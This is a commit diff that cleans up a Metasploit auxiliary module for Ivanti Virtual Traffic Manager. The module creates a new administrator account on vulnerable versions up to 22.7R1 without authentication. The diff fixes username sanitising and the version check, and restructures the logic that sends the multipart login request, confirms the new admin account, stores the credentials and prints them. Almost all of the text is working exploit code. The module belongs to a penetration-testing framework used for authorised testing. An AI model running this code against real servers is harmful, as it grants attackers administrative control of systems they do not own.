code cleanup

h4x-x0r · h4x-x0r · commit 82f51bb9b741 · 2024-08-16T15:43:34.000+01:00
code cleanup
diff --git a/modules/auxiliary/admin/http/ivanti_vtm_admin.rb b/modules/auxiliary/admin/http/ivanti_vtm_admin.rb
@@ -39,7 +39,7 @@ def initialize(info = {})
 
     register_options([
       OptString.new('TARGETURI', [true, 'Base path', '/']),
-      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username.gsub('.', '_')]),
+      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username.gsub(/[^a-zA-Z0-9_-]/, '_')]),
       OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(12)]),
     ])
   end
@@ -59,7 +59,7 @@ def check
     match = body.match(version_regex)
     if match
       version = match[1]
-      return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('22.7R1')
+      return Exploit::CheckCode::Appears("Version: #{version}") if Rex::Version.new(version) <= Rex::Version.new('22.7R1')
     else
       return Exploit::CheckCode::Safe
     end
@@ -88,40 +88,37 @@ def run
     html = res.get_html_document
     title_tag = html.at_css('title')
 
-    if title_tag
-      title_text = title_tag.text.strip
-      if title_text == '2'
-        print_status('Request to add new admin user sent, verifying...')
+    fail_with(Failure::UnexpectedReply, 'title tag not found.') unless title_tag
+    title_text = title_tag.text.strip
+    if title_text == '2'
+      print_status('Request to add new admin user sent, verifying...')
 
-        form = Rex::MIME::Message.new
-        form.add_part('form', nil, nil, 'form-data; name="_form_submitted"')
-        form.add_part(datastore['NEW_USERNAME'], nil, nil, 'form-data; name="form_username"')
-        form.add_part(datastore['NEW_PASSWORD'], nil, nil, 'form-data; name="form_password"')
-        form.add_part('Login', nil, nil, 'form-data; name="form_submit"')
+      form = Rex::MIME::Message.new
+      form.add_part('form', nil, nil, 'form-data; name="_form_submitted"')
+      form.add_part(datastore['NEW_USERNAME'], nil, nil, 'form-data; name="form_username"')
+      form.add_part(datastore['NEW_PASSWORD'], nil, nil, 'form-data; name="form_password"')
+      form.add_part('Login', nil, nil, 'form-data; name="form_submit"')
 
-        res = send_request_cgi(
-          {
-            'method' => 'POST',
-            'uri' => normalize_uri(target_uri.path, 'apps', 'zxtm', 'login.cgi'),
-            'ctype' => "multipart/form-data; boundary=#{form.bound}",
-            'data' => form.to_s
-          }
-        )
-        if res && res.code == 302 && res.get_cookies.include?('ZeusTMZAUTH_')
-          store_valid_credential(user: datastore['NEW_USERNAME'], private: datastore['NEW_PASSWORD'], proof: html)
-          print_good("New admin user was successfully added:\n\t#{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
-          print_good("Login at: https://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}apps/zxtm/login.cgi")
-        end
-
-      elsif title_text == '0' && html.to_s.include?('ERROR: Specified user already exists')
-        fail_with(Failure::BadConfig, "Specified user already exists. Specify a different user name with 'set NEW_USERNAME <USER>'.")
-      elsif title_text == '0' && html.to_s.include?('ERROR: Username must contain only: letters, numbers,')
-        fail_with(Failure::BadConfig, "Specified username is invalid. Username must contain only letters, numbers, underscores (_), and hyphens (-). Specify a different user name with 'set NEW_USERNAME <USER>'.")
-      else
-        fail_with(Failure::NotVulnerable, 'Unexpected string found inside the title tag: ' + title_text)
+      res = send_request_cgi(
+        {
+          'method' => 'POST',
+          'uri' => normalize_uri(target_uri.path, 'apps', 'zxtm', 'login.cgi'),
+          'ctype' => "multipart/form-data; boundary=#{form.bound}",
+          'data' => form.to_s
+        }
+      )
+      if res && res.code == 302 && res.get_cookies.include?('ZeusTMZAUTH_')
+        store_valid_credential(user: datastore['NEW_USERNAME'], private: datastore['NEW_PASSWORD'], proof: html)
+        print_good("New admin user was successfully added:\n\t#{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
+        print_good("Login at: #{full_uri(normalize_uri(target_uri, 'apps/zxtm/login.cgi'))}")
       end
+
+    elsif title_text == '0' && html.to_s.include?('ERROR: Specified user already exists')
+      fail_with(Failure::BadConfig, "Specified user already exists. Specify a different user name with 'set NEW_USERNAME <USER>'.")
+    elsif title_text == '0' && html.to_s.include?('ERROR: Username must contain only: letters, numbers,')
+      fail_with(Failure::BadConfig, "Specified username is invalid. Username must contain only letters, numbers, underscores (_), and hyphens (-). Specify a different user name with 'set NEW_USERNAME <USER>'.")
     else
-      fail_with(Failure::UnexpectedReply, 'title tag not found.')
+      fail_with(Failure::NotVulnerable, 'Unexpected string found inside the title tag: ' + title_text)
     end
   end
 end
